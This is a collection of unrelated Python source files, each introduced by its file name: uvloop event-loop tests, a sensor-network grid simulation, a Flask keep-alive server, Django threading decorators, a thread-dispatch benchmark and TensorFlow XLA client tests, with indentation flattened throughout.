self.loop.set_exception_handler(handler)
def cb():
1 / 0
meth(cb)
self.assertIsNone(context)
self.loop.run_until_complete(asyncio.sleep(0.05, loop=self.loop))
self.assertIs(type(context['exception']), ZeroDivisionError)
self.assertTrue(context['message'].startswith(
'Exception in callback'))
if debug:
tb = context['source_traceback']
self.assertEqual(tb[-1 + stack_adj].name, 'run_test')
else:
self.assertFalse('source_traceback' in context)
del context
for debug in (True, False):
for meth_name, meth, stack_adj in (
('call_soon',
self.loop.call_soon, 0),
('call_later', # `-1` accounts for lambda
lambda *args: self.loop.call_later(0.01, *args), -1)
):
with self.subTest(debug=debug, meth_name=meth_name):
run_test(debug, meth, stack_adj)
def test_now_update(self):
async def run():
st = self.loop.time()
time.sleep(0.05)
return self.loop.time() - st
delta = self.loop.run_until_complete(run())
self.assertTrue(delta > 0.049 and delta < 0.6)
def test_call_later_1(self):
calls = []
def cb(inc=10, stop=False):
calls.append(inc)
self.assertTrue(self.loop.is_running())
if stop:
self.loop.call_soon(self.loop.stop)
self.loop.call_later(0.05, cb)
# canceled right away
h = self.loop.call_later(0.05, cb, 100, True)
self.assertIn('.cb', repr(h))
h.cancel()
self.assertIn('cancelled', repr(h))
self.loop.call_later(0.05, cb, 1, True)
self.loop.call_later(1000, cb, 1000) # shouldn't be called
started = time.monotonic()
self.loop.run_forever()
finished = time.monotonic()
self.assertLess(finished - started, 0.1)
self.assertGreater(finished - started, 0.04)
self.assertEqual(calls, [10, 1])
self.assertFalse(self.loop.is_running())
def test_call_later_2(self):
# Test that loop.call_later triggers an update of
# libuv cached time.
async def main():
await asyncio.sleep(0.001)
time.sleep(0.01)
await asyncio.sleep(0.01)
started = time.monotonic()
self.loop.run_until_complete(main())
delta = time.monotonic() - started
self.assertGreater(delta, 0.019)
def test_call_later_negative(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop.stop()
self.loop.call_later(-1, cb, 'a')
self.loop.run_forever()
self.assertEqual(calls, ['a'])
def test_call_at(self):
i = 0
def cb(inc):
nonlocal i
i += inc
self.loop.stop()
at = self.loop.time() + 0.05
self.loop.call_at(at, cb, 100).cancel()
self.loop.call_at(at, cb, 10)
started = time.monotonic()
self.loop.run_forever()
finished = time.monotonic()
self.assertLess(finished - started, 0.07)
self.assertGreater(finished - started, 0.045)
self.assertEqual(i, 10)
def test_check_thread(self):
def check_thread(loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an "
"event loop other than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = self.new_loop()
try:
asyncio.set_event_loop(loop2)
check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test_run_once_in_executor_plain(self):
called = []
def cb(arg):
called.append(arg)
async def runner():
await self.loop.run_in_executor(None, cb, 'a')
self.loop.run_until_complete(runner())
self.assertEqual(called, ['a'])
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test_run_until_complete_type_error(self):
self.assertRaises(
TypeError, self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_loop()
self.addCleanup(other_loop.close)
self.assertRaises(
ValueError, other_loop.run_until_complete, task)
def test_run_until_complete_error(self):
async def foo():
raise ValueError('aaa')
with self.assertRaisesRegex(ValueError, 'aaa'):
self.loop.run_until_complete(foo())
def test_debug_slow_callbacks(self):
logger = logging.getLogger('asyncio')
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.2
self.loop.call_soon(lambda: time.sleep(0.3))
with mock.patch.object(logger, 'warning') as log:
self.loop.run_until_complete(asyncio.sleep(0, loop=self.loop))
self.assertEqual(log.call_count, 1)
# format message
msg = log.call_args[0][0] % log.call_args[0][1:]
self.assertIn('Executing <Handle', msg)
self.assertIn('test_debug_slow_callbacks', msg)
def test_debug_slow_timer_callbacks(self):
logger = logging.getLogger('asyncio')
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.2
self.loop.call_later(0.01, lambda: time.sleep(0.3))
with mock.patch.object(logger, 'warning') as log:
self.loop.run_until_complete(asyncio.sleep(0.02, loop=self.loop))
self.assertEqual(log.call_count, 1)
# format message
msg = log.call_args[0][0] % log.call_args[0][1:]
# self.assertIn('Executing <Handle', msg)
# self.assertIn('test_debug_slow_callbacks', msg)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1 / 0
logger = logging.getLogger('asyncio')
# Test call_soon (events.Handle)
with mock.patch.object(logger, 'error') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
# Test call_later (events.TimerHandle)
with mock.patch.object(logger, 'error') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
def test_set_exc_handler_custom(self):
logger = logging.getLogger('asyncio')
def run_loop():
def zero_error():
self.loop.stop()
1 / 0
self.loop.call_soon(zero_error)
self.loop.run_forever()
errors = []
def handler(loop, exc):
errors.append(exc)
self.loop.set_debug(True)
if hasattr(self.loop, 'get_exception_handler'):
# Available since Python 3.5.2
self.assertIsNone(self.loop.get_exception_handler())
self.loop.set_exception_handler(handler)
if hasattr(self.loop, 'get_exception_handler'):
self.assertIs(self.loop.get_exception_handler(), handler)
run_loop()
self.assertEqual(len(errors), 1)
self.assertRegex(errors[-1]['message'],
'Exception in callback.*zero_error')
self.loop.set_exception_handler(None)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Exception in callback.*zero'),
exc_info=mock.ANY)
self.assertEqual(len(errors), 1)
def test_set_exc_handler_broken(self):
logger = logging.getLogger('asyncio')
def run_loop():
def zero_error():
self.loop.stop()
1 / 0
self.loop.call_soon(zero_error)
self.loop.run_forever()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Unhandled error in exception handler'),
exc_info=mock.ANY)
def test_default_exc_handler_broken(self):
logger = logging.getLogger('asyncio')
_context = None
class Loop(uvloop.Loop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
loop.stop()
1 / 0
loop.call_soon(zero_error)
loop.run_forever()
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch.object(logger, 'error') as log:
run_loop()
log.assert_called_with(
self.mock_pattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError,
'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
class TestBaseUV(_TestBase, UVTestCase):
def test_loop_create_future(self):
fut = self.loop.create_future()
self.assertTrue(isinstance(fut, asyncio.Future))
self.assertIs(fut._loop, self.loop)
fut.cancel()
def test_loop_std_files_cloexec(self):
# See https://github.com/MagicStack/uvloop/issues/40 for details.
for fd in {0, 1, 2}:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
self.assertFalse(flags & fcntl.FD_CLOEXEC)
class TestBaseAIO(_TestBase, AIOTestCase):
pass
class TestPolicy(unittest.TestCase):
def test_uvloop_policy(self):
try:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop = asyncio.new_event_loop()
try:
self.assertIsInstance(loop, uvloop.Loop)
finally:
loop.close()
finally:
asyncio.set_event_loop_policy(None)
|
GridTopology.py
|
import math
import random
import threading
from MacawNode import MacawNode
import wsnsimpy.wsnsimpy_tk as wsp
from Utilization import Utilization
PACKET_SIZE = 256
TX_RANGE = 100
NUM_SENDERS = 10
NODE_SPACING = 60
GRID_BOUNDS = [50, 50, 600, 600]
class GridTopology:
def __init__(self):
self.nodes = []
def set_nodes(self):
for x in range(GRID_BOUNDS[0], GRID_BOUNDS[2], NODE_SPACING):
for y in range(GRID_BOUNDS[1], GRID_BOUNDS[3], NODE_SPACING):
self.nodes.append(simulator.add_node(MacawNode, (x, y)))
for node in self.nodes:
node.tx_range = TX_RANGE
def get_receiver(self, sender):
        # Pick any node index other than the sender's so the receiver is
        # never the sender itself.
        possible_receiver = self.nodes[random.choice(
            [i for i in range(len(self.nodes)) if i != sender.id])]
# Ensure receiver is within range of sender (Pythagoras)
        if math.sqrt((sender.pos[0] - possible_receiver.pos[0]) ** 2 +
                     (sender.pos[1] - possible_receiver.pos[1]) ** 2) > TX_RANGE:
return self.get_receiver(sender)
else:
return possible_receiver
def run(self):
for cluster in range(NUM_SENDERS):
sender = self.nodes[random.randint(0, len(self.nodes) - 1)]
receiver = self.get_receiver(sender)
sender.add_data(PACKET_SIZE, receiver, time_offset=random.randint(0, int(NUM_SENDERS / 2)))
if __name__ == '__main__':
simulator = wsp.Simulator(
until=60,
timescale=1,
visual=True,
terrain_size=(650, 650),
title="MACAW Grid Topology Demo"
)
topology = GridTopology()
topology.set_nodes()
topology.run()
threading.Thread(target=Utilization, args=(simulator, topology.nodes,)).start()
simulator.run()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return open("index.html").read()
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
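# Usage sketch: call keep_alive() before the main blocking workload so the
# web server keeps answering uptime pings in the background; `run_main_task`
# is a hypothetical caller-side function, not part of this module.
#
#     keep_alive()
#     run_main_task()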
|
decorators.py
|
import logging, functools
from django.conf import settings
logger = logging.getLogger('biostar')
import threading
try:
# When run with uwsgi the tasks will be spooled via uwsgi.
from uwsgidecorators import spool, timer
except Exception as exc:
#
    # With no uwsgi module the tasks will run in threads instead of being spooled.
# Creating threaded versions of the decorators from uwsgi.
#
logger.warning("uwsgi module not found, tasks will run in threads")
# Create a threaded version of the spooler
def spool(pass_arguments=True):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if settings.DISABLE_TASKS:
return
if settings.MULTI_THREAD:
# Run process in separate thread.
logger.info(f"new thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
t.start()
else:
func(*args, **kwargs)
inner.spool = inner
return inner
# Gains an attribute called spool that runs the function in the background.
return outer
# Create a threaded version of the timer
def timer(secs, **kwargs):
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if settings.DISABLE_TASKS:
return
# The loop repeats the timer.
def loop():
ticker = threading.Event()
while not ticker.wait(secs):
func(*args, **kwargs)
if settings.MULTI_THREAD:
# Run process in separate thread, once.
logger.info(f"new time thread for function f{func} {args} {kwargs}")
t = threading.Thread(target=loop, daemon=True)
t.start()
else:
func(*args, **kwargs)
inner.timer = inner
return inner
# Gains an attribute called timer that will run the function periodically.
return outer
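# Usage sketch for the decorators above; the task bodies and interval are
# illustrative. In the threaded fallback, calling `.spool(...)` works because
# `inner.spool = inner`; the uwsgi path is assumed to expose the same attribute.
#
#     @spool(pass_arguments=True)
#     def send_digest(user_id):
#         ...
#
#     @timer(300)
#     def refresh_counts():
#         ...
#
#     send_digest.spool(user_id=1)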
|
thread-dispatch-bench.py
|
# Estimate the cost of simply passing some data into a thread and back, in as
# minimal a fashion as possible.
#
# This is useful to get a sense of the *lower-bound* cost of
# trio.to_thread.run_sync
import threading
from queue import Queue
import time
COUNT = 10000
def worker(in_q, out_q):
while True:
job = in_q.get()
out_q.put(job())
def main():
in_q = Queue()
out_q = Queue()
t = threading.Thread(target=worker, args=(in_q, out_q))
t.start()
while True:
start = time.monotonic()
for _ in range(COUNT):
in_q.put(lambda: None)
out_q.get()
end = time.monotonic()
print("{:.2f} µs/job".format((end - start) / COUNT * 1e6))
main()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class ComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(unittest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
root = c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(ComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
